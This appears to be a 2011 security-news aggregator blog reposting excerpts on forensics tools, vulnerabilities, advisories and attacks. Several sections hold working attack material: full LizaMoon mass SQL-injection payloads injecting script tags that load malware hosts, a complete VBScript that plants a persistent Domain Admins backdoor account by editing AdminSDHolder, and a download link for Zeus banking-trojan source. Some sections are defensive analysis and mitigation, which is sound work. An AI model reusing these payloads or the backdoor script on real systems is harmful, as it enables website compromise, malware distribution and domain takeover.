Apr 8, 2011

Open Source Android Digital Forensics Application



I think this is the first android digital forensics application and it's so helpful.


In an effort to give back to the community, we have released our logical Android Forensic application as open source. You can download it on Google Code and additional details are on my blog.

Application Architecture
The application was developed with a generic architecture which will allow other programmers to easily add support for new applications and data sources. Currently, we pull the following information in CSV files on the SD Card:
  • Browser history
  • Call logs
  • Contact Methods (email, phones, etc.)
  • Organizations (companies that contacts are in)
  • People (the individual people)
  • SMS
While security on Android phone is pretty decent, applications can (and do) share data. We take advantage of this sharing (via ContentProviders) and extract the data for forensic purposes.

Browser History Example

if you want detail of this part, please go to the Source.

How to install
If you have an Android device (or run the emulator from the SDK), you can install the application (an .apk file).
To do this, you can either download the application online and install directly however you need to enable the Settings -> Application Settings -> Unknown sources option (until we sign the .apk which we hope to do soon).

An alternate method (and my preference) is to install using the Android Debug Bridge (adb). To do this, you must first install the Android SDK on your workstation. For Windows, you need to install the USB drivers and on Linux you must tweak udev but there are plenty of online tutorials about this. You also need to enable USB Debugging on the phone, which you can do under Settings -> Application Settings -> Development -> USB Debugging.

Download the AndroidForensics.apk from Google Code and save it to c:\\af. Connect the Android device to your computer via USB and do the following from a cmd prompt:


List devices
C:\\af>adb devices
List of devices attached
HT91YGZ08111 device
Install application
C:\\af>adb install AndroidForensics.apk
419 KB/s (20138 bytes in 0.046s)
pkg: /data/local/tmp/AndroidForensics.apk
Success
On phone, run viaForensics application and click capture
You will receive a message when the application completes
Copy CSV files to computer
C:\\af>adb pull /sdcard/forensics c:\\af
pull: building file list...
pull: /sdcard/forensics/20100225.0915.SMS.csv -> c:\\af/20100225.0915.SMS.csv
pull: /sdcard/forensics/20100225.0915.People.csv -> c:\\af/20100225.0915.People.csv
pull: /sdcard/forensics/20100225.0915.Organizations.csv -> c:\\af/20100225.0915.Organizations.csv
pull: /sdcard/forensics/20100225.0915.ContactMethods.csv -> c:\\af/20100225.0915.ContactMethods.csv
pull: /sdcard/forensics/20100225.0915.CallLogCalls.csv -> c:\\af/20100225.0915.CallLogCalls.csv
pull: /sdcard/forensics/20100225.0915.Browser.csv -> c:\\af/20100225.0915.Browser.csv
6 files pulled. 0 files skipped.
30 KB/s (38729 bytes in 1.249s)


If you want to download or talk to this developer, please go to the Source.
Source: http://computer-forensics.sans.org/blog/2010/03/01/open-source-android-digital-forensics-application/

How To Spoof Ip Address To Web Server With HTTP Request

This article is very useful for me to test something. Spoof IP with adding "X-Forwarded-For" into the HTTP Request, if you want to know how it works or how to defense this attack.


Please go to the Source.


Source: http://www.shaadiya.com/ask/2007/06/15/how-to-spoof-ip-address-hackers-view-and-the-way-to-protect-sites-with-this-fake/

Facebook Bully Video Actually a XSS Exploit

 
A security researcher discovered a new cross-site-scripting vulnerability on Facebook, days after the social networking giant patched a different XSS flaw in its mobile API. At least one active scam is exploiting the new bug at this time.

Do not click links involving a video of a bully,” Joey Tyson, a security engineer at Gemini Security Solutions, posted on Twitter. Tyson writes about social networking sites’ privacy and security issues on his blog, Social Hacking.

The flaw has to do with the way browsers load certain links formatted in “a certain syntax” as Javascript even though they are not filtered by Javascript, Tyson said. It is more sophisticated than most XSS attacks as the actually video does load for the user. The “JS payload can do quite a bit,” Tyson added.
The app can post the link to the “video” on the user’s Wall, add the user to a scam event and send invites to the event to friends, and send out the link on Facebook Chat.

A malicious app called “April Fools Prank” identified by Google engineer Ashish Bhatia on his personal blog appears to have used the same exploit, according to Tyson.

Users on Facebook who click on a link and land on an app page with an embedded video should not click on the video, Tyson warned. Infected users should check “liked” pages for any rogue sites and reset their passwords.
...
...
if you want to read full article or see the source code of this incident. Please download or look at the Source.
Source:  
http://pastebin.com/73xfQ2wj
http://www.eweek.com/c/a/Security/Facebook-Bully-Video-Actually-a-XSS-Exploit-121829

Apr 7, 2011

vSphere 4.1 Hardening Guide

This document is the official release of the vSphere 4.1 Security Hardening Guide.  This version is based on feedback collected during the public draft comment period.

If you want to download this document, please go to the Source.
Source: http://communities.vmware.com/docs/DOC-15413

HACKXOR [webapp hacking game]

About hacxkor

Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc

Features:
  • Client attack simulation using HtmlUnit; no alert('xss') here.
  • Smooth difficulty gradient from moderately easy to fiendishly tricky.
  • Realistic vulnerabilities modelled from Google, Mozilla, etc (No rot13!)
  • Open ended play; progress by any means possible.

Play the online demo

The first two levels can be played online here. Since this is kindly being hosted by SourceForge, there are a couple of common sense rules:
  • No automated scanners or bruteforce tools (nmap, BURP scanner, skipfish, etc)
  • Only exploit http://hackxor.sourceforge.net/* (Other sites on the same IP are not fair game)
Start at wraithmail and login with algo:smurf
If you just want an SQLi challenge, see if you extract usernames&passwords from the second level

Download&install instructions

  • Download the full version of hackxor (700mb) [ if you want to download, please go to the Source]
  • Install VMWare Player (This involves creating a free account with vmware)
  • Extract hackxor1.7z, run the image using VMware player.
  • Work out what the IP of hackxor is ((try 172.16.93.129)|| logging into the VM with username:root pass:hackxor and typing ifconfig)
  • Configure your hosts file (/etc/hosts on linux) to redirect the following domains to the IP of hackxor: wraithmail, wraithbox, cloaknet, GGHB, hub71, utrack.
  • Browse to http://wraithmail:8080 and login with username:algo password:smurf
If you can't edit the hosts file for some reason, you could use the 'Override hostname resolution' option in Burp proxy Troubleshooting the installation:
  • If http://wraithmail:8080 loads everything is probably working.
  • First: Try 'nmap wraithmail' in a shell to see if port 8080 is open. If it is open, contact me! Otherwise:
  • Second: Try nmap . If that succeeds, fix your hosts file. Otherwise:
  • Third: If you really can't get any network contact with the VM, check the VM settings in the VM manager
  • (this does not involve logging into the virtual machine). Make sure it is set to NAT. If that doesn't fix it:
  • Fourth: Try changing the VM network setting to 'Bridged'. This will mean other people on the LAN can access it.
  • Fifth: If all else fails, contact me on twitter.


Hints&tips


Read some cryptic spoiler-free hints (Last updated 5th April)

Source: http://hackxor.sourceforge.net/cgi-bin/index.pl

Linux Forensics Tools Repository

CERT Linux Forensics Tools Repository, a repository of packages for Linux distributions. Currently, Fedora and Centos/RHEL are provided in the respository.

CERT's Linux Forensics Tools Repository provides many useful packages for cyber forensics acquisition and analysis practitioners.

CERT's Linux Forensics Tools Repository is not a standalone repository, but rather an extension of the supported systems. Tools can be installed as needed or all at once using the CERT-Forensics-Tools meta package.

Also described here is the CERT VMware-based Forensics Appliance. This appliance is a Fedora-based VMware guest intended to be installed under VMware Workstation, Player, or Fusion.
Finally, also described here are the packages built to support the Win2-7 Transformation Pack for Fedora. This pack is used in the CERT Forensics Appliance to give a Window 7 look and feel to the default examiner login. Since these packages appear to be generally useful, they were placed in their own repository with their own release repo RPM.
Source: http://www.cert.org/forensics/tools/ 

Analysis of LizaMoon: Stored XSS via SQL Injection.

This article is very interesting for me and I just notice some part of the Source into this post.  If you want to see all payload or the meaning of attack, please go to the Source.

LizaMoon Attacks
As most of you have already heard, or have faced yourselves, the LizaMoon mass SQL Injection attacks are still going strong on the web. Here is a recent entry from the WASC Web Hacking Incident Database (WHID) -

WHID 2011-61: LizaMoon Mass SQL Injection Attack Points to Rogue AV Site

Entry Title: WHID 2011-61: LizaMoon Mass SQL Injection Attack Points to Rogue AV Site
WHID ID: 2011-61
Date Occurred: March 29, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Multiple
Attacked Entity Geography: 
Incident Description: Attackers have launched a large-scale SQL injection attack that has compromised several thousand legitimate Websites, including a few catalog pages from Apple's iTunes music store.
Mass Attack: Yes
Mass Attack Name: LizaMoon
Reference: http://www.eweek.com/c/a/Security/LizaMoon-Mass-SQL-Injection-Attack-Points-to-Rogue-AV-Site-852537/
Attack Source Geography:

Mass SQL Injection Bots in 2008

In 2008, attackers figure out an ingenious method to generically inject SQL payloads into any vulnerable sites without prior knowledge of the database structure. They accomplish this by using multiple sql commands to essentially create a script that would generically gather then loop through all table names and append on some malicious javascript that points to malware on a 3rd party site.

A Skeleton Key attack payload if you will all in one request.  Brutal...
Here is an example generic SQL injection payload from 2008  -
GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20
VARCHAR(4000);SET%20@S=CAST(0x4445434c41524520405420
5641524348415228323535292c4043205641524348415228323535
29204445434c415245205461626c655f437572736f722043555253
4f5220464f522053454c45435420612e6e616d652c622e6e616d652
046524f4d207379736f626a6563747320612c737973636f6c756d6
e73206220574845524520612e69643d622e696420414e4420612e
78747970653d27752720414e442028622e78747970653d393920
4f5220622e78747970653d3335204f5220622e78747970653d323
331204f5220622e78747970653d31363729204f50454e205461626
c655f437572736f72204645544348204e4558542046524f4d20546
1626c655f437572736f7220494e544f2040542c4043205748494c4
528404046455443485f5354415455533d302920424547494e20455
845432827555044415445205b272b40542b275d20534554205b27
2b40432b275d3d525452494d28434f4e56455254285641524348415
22834303030292c5b272b40432b275d29292b27273c7363726970
74207372633d73646f2e313030306d672e636e2f63737273732f77
2e6a733e3c2f7363726970743e27272729204645544348204e4558
542046524f4d205461626c655f437572736f7220494e544f2040542
c404320454e4420434c4f5345205461626c655f437572736f722044
45414c4c4f43415445205461626c655f437572736f7220%20AS%20
VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-US
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.example.com
Connection: Close
If we decode the HEX encoded SQL data, we see that this is actually a script command that loops through various DB table fields and then appends the XSS javascript code to them all -
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=sdo.1000mg.cn/csrss/w.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Current LizaMoon-type SQL Injection Payloads

Here are two examples:

Sample #1 -
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+
as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(
108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2B
char(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(10
4)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bch
ar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(11
6)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bcha
r(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)
%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(
114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+v
archar(8)))--

Sample #1 Decoded -
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+
as+varchar(8000)),cast(</title><script src=http://google-stats49.info/ur.php>
+as+varchar(8000)),cast(char(32)+as+v
archar(8)))--
Notice that this SQL payload does not use the same generic for loop scripting and intstead focuses on specific DB fields (usd_ResponseDetails and categoryName).

Sample #2 -
prod=MG0011'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000))
,cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2B
char(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(11
6)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bch
ar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(108)%2Bchar(105)%2Bchar(122)
%2Bchar(97)%2Bchar(109)%2Bchar(111)%2Bchar(111)%2Bchar(110)%2Bchar(46)%2Bchar(99)%2Bchar
(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%
2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(1
05)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--

Sample #2 Decoded -
prod=MG0011'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000))
,cast(</title><script src=http://lizamoon.com/ur.php></script>
+as+varchar(8000)),cast(char(32)+as+varchar(8)))--

Notice, again, that this SQL payload does not use the same generic for loop scripting and intstead focuses on different specific DB fields (tblMembers and Forename).

Defending against SQL Injection

Step #1 - Input Validation

Step #2 - Use Prepared Statements with Bound Parameters

OWASP XSS Prevention Cheat-sheet

Make sure that all developers review the OWASP XSS Prevention Cheat-sheet.

Output Encoding/Escaping

An intersting item to note with trying to identify the scale of these mass attacks is this -
The number of infected links returned by search engines only lists when sql injection was successful but the XSS payload injection wasn't.

Why is this?  Take a look at an example Google Search question for LizaMoon payloads.  Here is some example raw html of a site returned by the search:

<td id="tdDevelopmentName">Riyad Resort      
&lt;/title&gt;&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;
&lt;/title&gt;&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;
 Gallery</td>
 
This code does not execute javascript but instead only renders the text.  If the XSS script tags were successfully injected, meaning that the apps were not properly output encoding/escaping payloads, then the search engine spiders would not be indexing the snippets of code.  The search engines do not index the raw html source code but only the rendered text.
So, even though sites listed in the search results were vulnerable to SQL Injection and compromised, they actually prevented the goal of this attack since the web app is properly output encoding the data sent to the clients.

Ensure proper Output Encoding/Escaping Coverage

After working with new customers who came to us after being compromised, we are finding some interesing root-cause/remediation scenarios.  Even if an organization conducts proper application analysis to identify locations that hold user-supplied data, where they are echoed back to clients and then applying proper contextual output encoding, this may not be enough...

Due to the SQL Injection payload adding the malicious JS data to many back-end DB fields, the data may be injected into a field (such as the page Title data) that was never legitimately supposed to contain user-supplied data.  The result is that organization must re-analyze their output escaping strategy to ensure that they have applied encoding to all possible fields.

Identifying Rogue JavaScript in Output 

Regardless of inbound request data, security devices such as Web Application Firewalls (WAFs) can aid in the tracking of legitimate script tags contained within web pages.  For instance, the Trustwave WebDefend WAF has the capability to identify when new script tags are successfully entered into response pages.

Identifying Malware Links in Response Pages

As outlined in the previous blog post ModSecurity Advanced Topic of the Week: Malware Link Detection, ModSecurity has a new API which allows it to utilize Google's Safe Browsing DB.  This can help to prevent malicious links from being sent from your site onto clients.

Source: http://blog.spiderlabs.com/2011/04/analysis-of-lizamoon-stored-xss-via-sql-injection.html

Zeus Version 2 Source Code was disclosure.

If you want to download it, try this but I don't get the password now. And sorry for the source, I can't remember where I got this file from. I don't sure this file is real or not.

If someone know password of this file,please tell me.

Source: http://www.4shared.com/file/MFTUa60x/zeus_source_code_v2.html

Great wallpaper for vim user


Source: http://www.viemu.com/vi-vim-cheat-sheet.gif

Wordpress backup vuln published

A remote execution vulnerability has been discovered in Wordpress backup utility BackWPup.
According to Sydney (Australia) company Sense of Security, which published the advisory along with a proof-of-concept, the vulnerability allows local or remote PHP files to be passed to a component of the utility.
“The input passed to the component wp_xml_export.php via the ‘wpabs’ variable allows the inclusion and execution of local or remote PHP files as long as a ‘_nonce’ value is known. The ‘_nonce’ value relies on a static constant which is not defined in the script meaning that it defaults to the value ‘822728c8d9’”, the advisory states.
Sense of Security says the vulnerability affects at least BackWPup Version 1.6.1 (the platform on which it has been tested), and users should upgrade to Version 1.7.1.

Source: http://www.theregister.co.uk/2011/04/06/wordpress_backup_vuln/

4 Free Tools to Detect Local Insecure Browser Plugins


Google Chrome and Secbrowsing
Users of Google Chrome rejoice—the browser flags common insecure plugins without the need for any additional tools. The alert appears when you attempt to load content that makes use of the vulnerable plugin:



If you’d like to be notified of outdated plugins proactively, even before Google Chrome has the need to use the plugin, install the optional Secbrowsing extension from Google.



Mozilla Plugin Check Page
Mozilla set up the Plugin Check page identify insecure plugins. The page works in Firefox as well as other browsers, and doesn’t require any tool installation. Mozilla provided some technical details regarding inner-workings of the server-side tool for those seeking additional information about it.



Qualys BrowserCheck
Qualys BrowserCheck is a free lightweight tool for scanning common browsers for vulnerable plugins. The tool needs to be installed locally, and is well documented by Qualys.



Secunia PSI
Secunia is well-known for Secunia PSI—a free local application to identify vulnerabilities in installed software. The tool is able to scan for not only insecure browser plugins, but also for vulnerabilities in other local software.



My Perspective
Secunia PSI rules when it comes to providing a comprehensive scan of local applications. In this, it exceeds the coverage of Qualys BrowserCheck, and would be my first choice if I were to install a scanner.
My kudos go to the Google Chrome team for building plugin-scanning capabilities directly into the browser. This approach has the potential of providing more complete and accurate results than the install-free Mozilla Plugin Check page, while providing the user with automatic alerting.

Source: http://blog.zeltser.com/post/4383301535/4-free-tools-to-detect-local-insecure-browser-plugins

OWASP: Malware Link Removal

Data Substitution Operator (@rsub) In the latest version of ModSecurity (2.6), we also introduced an extremely powerful new operator called @rsub which is short for RegEx Substitution.  As the name indicates, this operator allows you to match variable data and then do a substitution.  What makes this new operator even more powerful is that is has macro expansion capabilities.  This is extremely useful when you need generic data matching (see below).

Modify Live Data (STREAM_OUTPUT_BODY variable)

The @rsub operator is really cool, but what makes this use-case possible is another new feature in ModSecurity v.2.6 and that is the new STREAM_OUTPUT_BODY variable which gives direct filter level access to the live data.  Here is an updated ruleset that uses these new capabilities:
SecGsbLookupDB GsbMalware.dat
SecStreamOutBodyInspection On
SecRule STREAM_OUTPUT_BODY "@gsbLookup \Whttps?\:\/\/(.*?)(\"|>)" "chain,phase:4,capture,log,pass,msg:'Bad url detected in RESPONSE_BODY (Google Safe Browsing Check)',logdata:'http://www.google.com/safebrowsing/diagnostic?site=%{tx.0}'"
        SecRule STREAM_OUTPUT_BODY "@rsub s/%{tx.0}/MALICIOUS_URL_REMOVED/"
This ruleset will play Whack-a-Mole and actively swap out the malicious domains found within the GSB DB with the string MALICIOUS_URL_REMOVED in the response pages and still issue alert messages locally in ModSecurity so that security teams can investigate infected pages.

Live Examples

The first step was to identify a site that was infected by LizaMoon malware links.  After some quick google searches, I found the following site.
Screen shot 2011-04-06 at 12.20.35 PM

Tested the new GSB data substitution capabilities by configuring my local browser to use my local Apache+ModSecurity server as a forward proxy.  I then browsed to this same site.  Here is a screenshot of the infected after being cleansed by ModSecurity:
Screen shot 2011-04-06 at 12.25.14 PM

Conclusions

The ability to alter live http transactional data is a huge step foward, not only for ModSecurity, but for WAFs in general.  This allows for much more flexibility in responding to issues vs. the limited choice of blocking the entire transaction.  This particular use-case of removing malware links from infected pages is just the first example of this new feature.  More to come...

If you want to read full article, please go to the Source.
Source: http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-malware-link-removal.html

Sniffing USB traffic with VMWare

VMWare offers the possibility to dump any usb traffic at the lowest level to a dump file. We'll describe here how to activate this feature, and additionally publish a script to convert the dump file to the PCAP format, suitable for use with wireshark.

Enable USB logging

VMWare can be configured to dump all the low-level USB traffic going to a given virtual machine to a file on the host.
This functionnality is activated through the addition of a few lines in the .vmx virtual machine control file :
monitor = "debug"
usb.analyzer.enable = TRUE
usb.analyzer.maxLine = 8192
mouse.vusb.enable = FALSE
This will enable the log of the raw usb traffic to the vmware.log file, with the USBIO prefix. The maxline setting enables the full USB packet payload logging.
Once you start the virtual machine with these settings, beware that the log file may become very big quickly !

 

Analysing data

To make sense of the data gathered this way, a very good software is available : vsusb-analyser.
You can also refer to the project page for more information on the effects of the VMWare configuration elements.
As we were toying with the software, it appeared that the VMWare log format is not very compact or interoperable ; so we came around this limitation by writing a script that can convert the USB information back into a PCAP format. This way, we can watch the flow in Wireshark, or many other software.
It works pretty well for the data we tested it with, however please note that the PCAP format for USB is not very well documented, so ymmv.

If you want to download the script, please go to the Source.
Source: http://esec-lab.sogeti.com/dotclear/index.php?post/2011/04/06/Sniffing-USB-traffic-with-VMWare

DHCP client allows shell command injection !

Detail:
The Internet System Consortium's (ISC) open source DHCP client (dhclient) allows DHCP servers to inject commands which could allow an attacker to obtain root privileges. The problem is caused by incorrect filtering of metadata in server response fields. By using crafted host names, and depending on the operating system and what further processing is performed by dhclient-script, it can allow commands to be passed to the shell and executed. A successful attack does, however, require there to be an unauthorised or compromised DHCP server on the local network.

Impact:
Dhclient versions 3.0.x to 4.2.x are affected.

CVSS Score: 6.8 (AV:A/AC:L/Au:N/C:P/I:N/A:C)
For more information on CVSS scores, visit http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

Solution:
Update the software. Alternatively, users can deactivate host name evaluation or add an additional line to dhclient-script. On SUSE setting DHCLIENT_SET_HOSTNAME="no" in /etc/sysconfig/network/dhcp. if another system may add following line to dhclient-script at the beginning of the set_hostname() function:

new_host_name=${new_host_name//[^a-zA-Z0-9]/}

Alongside dhclient-script, X.org's 'X server resource database utility' (xrdb) is also affected, as it also evaluates host names transferred via DHCP. Crafted host names can also prove the undoing of X.Org servers where the X Display Manager Control Protocol (XDMCP) is used. Updating to xrdb 1.0.9 fixes the vulnerabilities. Some Linux distributors are already distributing new packages.

Source: 
http://www.thehackernews.com/2011/04/dhcp-client-allows-shell-command.html
http://www.isc.org/software/dhcp/advisories/cve-2011-0997

Apr 6, 2011

Two vulnerability of CISCO

The Cisco Product Security Incident Response Team (PSIRT) has published two important vulnerability advisories:
  • Cisco Network Admission Control Guest Server System Software Authentication Bypass Vulnerability
  • Cisco Secure Access Control System Unauthorized Password Change Vulnerability
Cisco Network Admission Control Guest Server System Software Authentication Bypass Vulnerability
Cisco Network Admission Control (NAC) Guest Server system software contains a vulnerability in the RADIUS authentication software that may allow an unauthenticated user to access the protected network.
Vulnerable Products
This vulnerability affects all versions of NAC Guest Server software prior to software version 2.0.3. The software version is displayed on the login page of the web server.
Details
The Cisco NAC Guest Server system software contains a vulnerability in the configuration file of the RADIUS authentication software. This misconfiguration may allow an unauthenticated user to access the protected network. This vulnerability may result in authentication bypass without requiring a valid username or password.
Impact
Successful exploitation of the vulnerability may allow unauthorized users to access the protected network.


Cisco Secure Access Control System Unauthorized Password Change Vulnerability
A vulnerability exists in some Cisco Secure Access Control System (ACS) versions that could allow a remote, unauthenticated attacker to change the password of any user account to any value without providing the account’s previous password. Successful exploitation requires the user account to be defined on the internal identity store.
Vulnerable Products
The following Cisco Secure ACS versions are affected by this vulnerability:
  • Cisco Secure ACS version 5.1 with patch 3, 4, or 5 (or any combination of these patches) installed and without patch 6 or later installed
  • Cisco Secure ACS version 5.2 without any patches installed
  • Cisco Secure ACS version 5.2 with patch 1 or 2 (or both of these patches) installed and without patch 3 or later installed
Details
Cisco Secure ACS operates as a centralized RADIUS and TACACS+ server, combining user authentication, user and administrator device access control, and policy control into a centralized identity networking solution.
A vulnerability exists in some Cisco Secure ACS versions that could allow a remote, unauthenticated attacker to change the password of any user account to any value without providing the account’s previous password. Successful exploitation requires the user account to be defined on the internal identity store.
This vulnerability does not allow an attacker to perform any other changes to the ACS database. That is, an attacker cannot change access policies, device properties, or any user attributes except the user password.
Impact
Successful exploitation of this vulnerability could allow an attacker to change the password of any user account that is defined on the internal identity store. After the password has been changed, an attacker could use those credentials to impersonate the user. Because the user would not know the new password, the attacker could also prevent a user from authenticating.

Source:
http://www.ciscozine.com/2011/04/05/march-2011-two-cisco-vulnerabilities/
http://www.cisco.com/en/US/products/products_security_advisory09186a0080b74114.shtml
http://www.cisco.com/en/US/products/products_security_advisory09186a0080b74117.shtml

Backdoor in Active Directory

Create backdoor effectively using the script, you should:

1. Create a plain user;
2. Allow the user to change members in "Builtin\Terminal Server License Servers" user group;
3. Allow the group "Builtin\Terminal Server License Servers" to change members in another group, for example, "Domain Admins".

Here we should note that it’s impossible just to change ACL for "Domain Admins" group. Active Directory architecture provides protection for ACLs of the most sensitive objects (adminSDHolder, [3]), such as:

- Enterprise Admins
- Schema Admins
- Domain Admins
- Administrators
- Domain Controllers
- Cert Publishers
- Backup Operators
- Replicator Server Operators
- Account Operators
- Print Operators

If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System, ", or set "adminCount" attribute to 0 for the required object [3]. Overwriting the ACL template is more promising, as not every administrator knows this "protection" mechanism in Active Directory.

User can use the following script to automate in Active Directory.

On Error Resume Next

username = "PT"
password = "P@ssw0rd"
userDN = "cn=Users"

joinGroupDN = "cn=Terminal Server License Servers, cn=Builtin"
joinGroup = "BUILTIN\Terminal Server License Servers"

adminsGroup = "CN=Domain Admins,CN=Users"

Dim objRoot, objContainer, objUser, objGroup, objSysInfo, strUserDN
Set objSysInfo = CreateObject("ADSystemInfo")
strUserDN = objSysInfo.userName
Set objUser = GetObject("LDAP://" & strUserDN)

Set objRoot = GetObject("LDAP://rootDSE")
Set objContainer = GetObject("LDAP://" & userDN & "," & objRoot.Get("defaultNamingContext"))

Set objUserCreate = objContainer.Create("User", "cn=" & username)
objUserCreate.Put "sAMAccountName", username
objUserCreate.SetInfo
On Error Resume Next

objUserCreate.SetPassword password
objUserCreate.Put "userAccountControl", 66048
objUserCreate.SetInfo
On Error Resume Next

GroupAddAce joinGroupDN,username
GroupAddAce adminsGroup,joinGroup
GroupAddAce "CN=AdminSDHolder,CN=System",joinGroup

Function GroupAddAce(toGroup,forGroup)
Dim objSdUtil, objSD, objDACL, objAce
Set objGroup = GetObject ("LDAP://" & toGroup & "," & objRoot.Get("defaultNamingContext"))

Set objSdUtil = GetObject(objGroup.ADsPath)
Set objSD = objSdUtil.Get("ntSecurityDescriptor")
Set objDACL = objSD.DiscretionaryACL
Set objAce = CreateObject("AccessControlEntry")

objAce.Trustee = forGroup
objAce.AceFlags = 0
objAce.AceType = 5
objAce.AccessMask = 32
objAce.Flags = 1
objAce.ObjectType = "{BF9679C0-0DE6-11D0-A285-00AA003049E2}"
objDacl.AddAce objAce

objSD.DiscretionaryAcl = objDacl
objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
objSDUtil.SetInfo

End Function


If you want to see full article or talk to author, please go to the Source.
Source: http://ptresearch.blogspot.com/2011/04/backdoor-in-active-directory.html

Open Source network access control (NAC) system

 

PacketFence is a fully supported, trusted, Free and Open Source network access control (NAC) system. Boasting an impressive feature set including a captive-portal for registration and remediation, centralized wired and wireless management, 802.1X support, layer-2 isolation of problematic devices, integration with the Snort IDS and the Nessus vulnerability scanner; PacketFence can be used to effectively secure networks - from small to very large heterogeneous networks. Among the different markets are :

banks
colleges and universities
engineering companies
manufacturing businesses
school boards (K-12)

.. and many more!

Released under the GPL, PacketFence is built using trusted open-source components that allows it to offer an impressive amount of features.


Source: http://www.packetfence.org/home.html

Apr 5, 2011

Sony sites was down by Anonymous Group, Now.

After Anonymous Group has announced about operation payback to Sony name's "OpSony" [Operation Sony]. (detail here)Now some websites infrastructure of Sony was down.

***Update, Now PSN and Playstation websites was down.
***Update#2, Anonymous is staging a 24-hour, in-store boycott at Sony stores around world on Saturday, April 16.






Source: 
http://anonnews.org/?p=press&a=item&i=787
http://isc.sans.edu/diary.html?storyid=10654
http://www.pcmag.com/article2/0,2817,2383344,00.asp

Apr 4, 2011

Remotely execute cmd.exe commands on multiple computers

Great job for  "Mohamed Garrana". This script's very useful and I think I can use it in some way...

if it works in cmd.exe , you can remotely execute on multiple servers.This script invokes whatever command you can use in cmd.exe on one or more computers
you input the command you'd like to run as a screen input when you run the script
you can use all cmd.exe command like [del,ipconfig /flushdns,ipconfig /registerdns,gpupdate /force ,notepad.exe,defrag c:, wuauclt /detectnow , powercfg, net start ,net stop,copy,arp,wscript.exe ....]

this script requires powershell Version 2.0 , because the cmdlet Invoke-WmiMethod is introduced in powershell V 2

PowerShell
# ============================================================================================== 
#   
# Script Name : Run Remote cmd.exe Commands 
 
# AUTHOR: Mohamed Garrana  
# DATE  : 4/12/2010 
 
# COMMENT:  
# this script invokes whatever command you can use in cmd.exe on one or more computers 
#you input the command name as a screen input when you run the script 
#you can use all cmd.exe command like [del,ipconfig /flushdns,ipconfig /registerdns,gpupdate /force ,notepad.exe,defrag c:, ... 
#..wuauclt /detectnow,powercfg,net start ,net stop,copy,arp,wscript.exe ....] 
#if you can do it from cmd.exe you can do it here on multiple computers at the same time 
# ============================================================================================== 
 
 
function Run-RemoteCMD { 
 
    param( 
    [Parameter(Mandatory=$true,valuefrompipeline=$true)] 
    [string]$compname) 
    begin { 
        $command = Read-Host " Enter command to run" 
        [string]$cmd = "CMD.EXE /C " +$command 
                        } 
    process { 
        $newproc = Invoke-WmiMethod -class Win32_process -name Create -ArgumentList ($cmd-ComputerName $compname 
        if ($newproc.ReturnValue -eq 0 ) 
                { Write-Output " Command $($command) invoked Sucessfully on $($compname)" } 
                # if command is sucessfully invoked it doesn't mean that it did what its supposed to do 
                #it means that the command only sucessfully ran on the cmd.exe of the server 
                #syntax errors can occur due to user input  
